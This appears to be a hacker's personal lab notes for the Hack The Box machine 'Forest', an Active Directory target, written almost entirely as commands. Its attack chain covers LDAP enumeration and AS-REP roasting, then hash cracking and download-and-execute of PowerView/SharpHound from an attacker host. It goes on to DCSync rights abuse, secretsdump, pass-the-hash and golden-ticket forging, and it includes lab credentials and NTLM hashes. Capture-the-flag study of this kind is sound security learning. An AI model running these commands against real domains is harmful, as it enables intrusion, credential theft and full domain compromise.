Forest

Multitask nmap scan

sleep 300 ; nmap -p- -v forest.htb -oN forest-nmap-al-port

common ports : 135 / 445 = smb 389 = LDAP

run internal network dns checking

nslookup
server forest.htb
127.0.0.1
forest.htb

LDAP

Locating base LDAP directory of a IP

using nmap:

locate -r nse$ | grep ldap
nmap -p 389 --script ldap-rootdse -Pn forest.htb
nmap -p 389 --script ldap-search -Pn forest.htb

nse$ = anything that ends with nse

ldapsearch

ldapsearch -H ldap://forest.htb 
ldapsearch -x -H ldap://forest.htb
ldapsearch -x -H ldap://forest.htb -s base namingcontexts
	ldapsearch -x -H ldap://forest.htb -b "DC=htb,DC=local" > htb/forest/ldap-anonymous.txt
ldapsearch -x -H ldap://forest.htb -b "DC=htb,DC=local"  'objectClass=person'
cat ldapsearch-person.txt | grep 'dn: CN='
ldapsearch -x -H ldap://forest.htb -b "DC=htb,DC=local"  'objectClass=person'  sAMAccountName | grep sAMAccountName | awk '{print $2}'

-h = host Note : Default have MD5 authentication -x = simple authentication / anonymous bind -b = get from -s base namingcontexts 'objectClass=' = filter by attributes eg: person,user

ldapdomaindump

ldapdomaindump -u 'emerald\pawn' -p 'WGMY2022!' 10.10.37.41

Password Crafting

Appending year to end of all password

for i in $(cat base2-password); do echo $i;echo ${i}2019;echo ${i}2020;done

Adding symbols to passwordlist

for i in $(cat base3-password); do echo $i;echo ${i}2019;echo ${i}2020;done

Improving passwordlist with hashcat

hashcat --force --stdout base3-password -r /usr/share/hashcat/rules/best64.rule

hashcat --force --stdout base3-password -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule

hashcat --force --stdout base3-password -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule | sort -u | awk 'length($0) >8' 

--force = no need gpu --stdout = print everything out -r = rule file best64.rule = random common permutation toggles1.rule = upper case lower case awk 'length($0) >8' = get password length > 8

impacket

locate impacket
cd /usr/share/doc/python3-impacket/examples
./GetNPUsers.py -dc-ip forest.htb -request 'htb.local/'
./GetNPUsers.py -dc-ip forest.htb -request 'htb.local/' -format hashcat 

Alternative

for user in $(cat users.txt); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done

GetNPUsers.py = ASREPRoast = Kerberoasting

hashcat

hashcat --example-hashes | grep -i krb
hashcat --example-hashes | less (then type /krb5asrep)
hashcat -m 18200 svc-alfresco-hash  /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule 

Alternative way to login

powerview emerald.wgmy/nur.ireene:p@ssw0rd@10.10.132.46  

python3 smbexec.py test.local/john:password123@10.10.10.1

winrm port open ?

evil-winrm -u svc-alfresco -p s3rvice -i forest.htb

command execution methods:

wmiexec
atexec
smbexec

• wmiexec executes commands via WMI

• atexec executes commands by scheduling a task with windows task scheduler

• smbexec executes commands by creating and running a service

bloodhound

neo4j console
bloodhound

To extract data for bloodhound :

bloodhound-python

bloodhound-python -u pwn -p 'WGMY2022!' -ns 10.10.19.239 -d emerald.wgmy -c all

sharphound

wget https://github.com/BloodHoundAD/SharpHound/releases/download/v1.1.1/SharpHound-v1.1.1.zip

iex(new-object net.webclient).downloadstring("http://10.10.14.6/SharpHound.ps1")

invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice


.\sharphound.exe -c all

in Bloodhound if see : Account Operators :

• Special group in windows that create account and put in different groups

Service Accounts

• Created by Account Operators

Account Operators

• Grant limited account creation to a user

• Execpt Administrator , Server Operators , Account Operators , Backup Operators or Print Operators groups

![[Pasted image 20230622011245.png]]

Create a new user using "Account Operators" because we are

net user jack Jack123 /add /domain

Check if member exist in the group "Exchange Windows Permissions"

net group "Exchange Windows Permissions"

Adding user into the group

net group "Exchange Windows Permissions" /add jack

Download powerview into remote machine

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26:8000/PowerView.ps1')

$pass = ConvertTo-SecureString 'Jack123' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential('HTB\jack', $pass)

Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity jack -Rights DCSync

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity jack -Rights DCSync

sudo  ./secretsdump.py htb.local/jack:Jack123@forest.htb > /home/kali/htb/forest/hashdump

./psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@forest.htb

evil-winrm -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 -i forest.htb

crackmapexec smb 10.10.10.161 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Print all hashes only

sudo  ./secretsdump.py htb.local/jack:Jack123@forest.htb > /home/kali/htb/forest/hashdump


cat hashdump | grep ::: | awk -F: '{print $4}'

Print all users : hashes

cat hashdump | grep ::: | awk -F: '{print $1":"$4}'

--user to ask hashcat adjust and remove usernames accordingly

hashcat -m 1000 forest-ntlm-hash --user /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule

Show result

hashcat -m 1000 forest-ntlm-hash --user --show   

Crafting Golden Ticket with user NotExist

sudo ./ticketer.py -nthash 819af826bb148e603acb0f33d17632f8  -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local NotExist

./psexec.py htb.local/NotExist@forest -k -no-pass
will login as admin
./wmicexec.py htb.local/NotExist@forest -k -no-pass

kerbrute

Rerefence : https://artkond.com/2016/12/18/pivoting-kerberos/

https://0xdf.gitlab.io/2020/03/21/htb-forest.html#shell-as-svc-alfresco

https://infra.newerasec.com/infrastructure-testing/privilege-esclation/windows/running-services